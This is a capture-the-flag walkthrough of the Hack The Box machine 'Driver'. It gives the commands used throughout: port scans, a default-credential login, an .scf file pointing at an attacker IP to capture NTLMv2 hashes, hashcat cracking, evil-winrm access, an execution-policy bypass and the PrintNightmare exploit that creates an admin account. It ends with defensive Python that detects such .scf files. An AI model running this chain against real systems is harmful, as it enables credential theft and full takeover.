# Driver

January 11, 2026

| Created by | Page | Difficulty | OS |
| --- | --- | --- | --- |
| MrR3boot | Hack The Box | Easy | Windows |

## Enumeration

I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports:

```
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.106 -oG scan
/opt/extractports scan
nmap -p80,135,445,5985 -Pn -sCV 10.10.11.106 -oN ports
```

## Initial Access

Accessing the web application prompted for credentials. After testing common default credentials, I successfully authenticated using:

```
admin : admin
```

Once logged in, I identified the domain driver.htb, which I added to /etc/hosts.

While browsing the application, I discovered the page fw_up.php, which allows file uploads. After testing several file types without success, I noticed that the page description indicated uploaded files were stored on a file share.

## NTLM Hash Capture via SCF File

When write access to a Windows file share is available, a common technique is to upload an .scf file that references a remote resource. When the file is accessed, Windows attempts to retrieve the resource, leaking NTLM credentials.

I created the following .scf file:

```
[Shell]
Command=2
IconFile=\\10.10.14.2\share\something.ico
[Taskbar]
Command=ToggleDesktop
```

While running Responder on my machine, I uploaded the file through the web application. Shortly after, I captured an NTLMv2 hash belonging to the user tony.

## Credential Cracking and Login

I cracked the NTLMv2 hash using Hashcat:

```
hashcat -m 5600 hash_NTLMv2 /usr/share/wordlists/rockyou.txt
```

This revealed valid credentials:

```
tony : liltony
```

Using these credentials, I authenticated to the system via WinRM:

```
evil-winrm -i 10.10.11.106 -u tony -p liltony
```

This granted access to the system and allowed retrieval of the user flag.

## Privilege Escalation

I reviewed the PowerShell command history for the user:

```
cat C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

The history contained references related to printer configuration. This suggested possible exploitation of the Windows Print Spooler service. After researching known vulnerabilities, I identified CVE-2021-1675 (PrintNightmare), which allows remote code execution via the Print Spooler service. I downloaded a public proof of concept.

## PoC Exploitation of PrintNightmare

When attempting to import the PowerShell module, execution was blocked by the current execution policy. I verified and modified it:

```
Get-ExecutionPolicy
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
```

I then imported the exploit module:

```
Import-Module .\cve-2021-1675.ps1
```

And executed the exploit:

```
Invoke-Nightmare
```

This created a new administrative user on the system. Using the newly created credentials, I authenticated as an administrator and obtained full access:

```
evil-winrm -i 10.10.11.106 -u adm1n -p 2bkpr
```

With administrative privileges, I accessed the Administrator directory and retrieved the final flag.
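The SCF technique used above works because Explorer resolves the IconFile UNC path and the client authenticates to whatever host it names. As an added, defender-side example (not part of this writeup), the following Python check can be run on files landing on a share or passing through an upload handler like fw_up.php; it parses the INI-style .scf content and flags any UNC value whose host is a raw IP or is outside an assumed allowlist (TRUSTED_HOSTS is a placeholder).

```python
# Added example (not from the writeup): flag uploaded .scf files whose entries
# point at a UNC host outside an assumed allowlist. Explorer resolves the
# [Shell] IconFile entry of an .scf file and authenticates to that host, which
# is the NTLM leak described above.
import configparser
import ipaddress
import re

TRUSTED_HOSTS = {"driver.htb", "dc01.driver.htb"}  # assumed allowlist
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\")  # \\host\share\... -> host


def unc_host(value: str):
    """Lower-cased host of a UNC path, or None if the value is not a UNC path."""
    m = UNC_RE.match(value.strip().strip('"'))
    return m.group("host").lower() if m else None


def is_ip_literal(host: str) -> bool:
    """True when the host is a raw IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scf_findings(content: str, trusted_hosts=TRUSTED_HOSTS):
    """Return [(section.key, host)] for each UNC value off the allowlist."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key case (IconFile, Command) as written
    try:
        parser.read_string(content)
    except configparser.Error:
        return [("parse-error", "")]  # malformed .scf still deserves review
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            host = unc_host(value)
            # An IP literal is flagged even if it is allowlisted by name elsewhere.
            if host and (is_ip_literal(host) or host not in trusted_hosts):
                findings.append((f"{section}.{key}", host))
    return findings


# Constructed sample mirroring the file used in the writeup.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.2\share\something.ico
[Taskbar]
Command=ToggleDesktop
"""
```

A non-empty result for a file with an .scf extension is a strong indicator of an attempted NTLM capture and is worth correlating with outbound SMB connections from the share host.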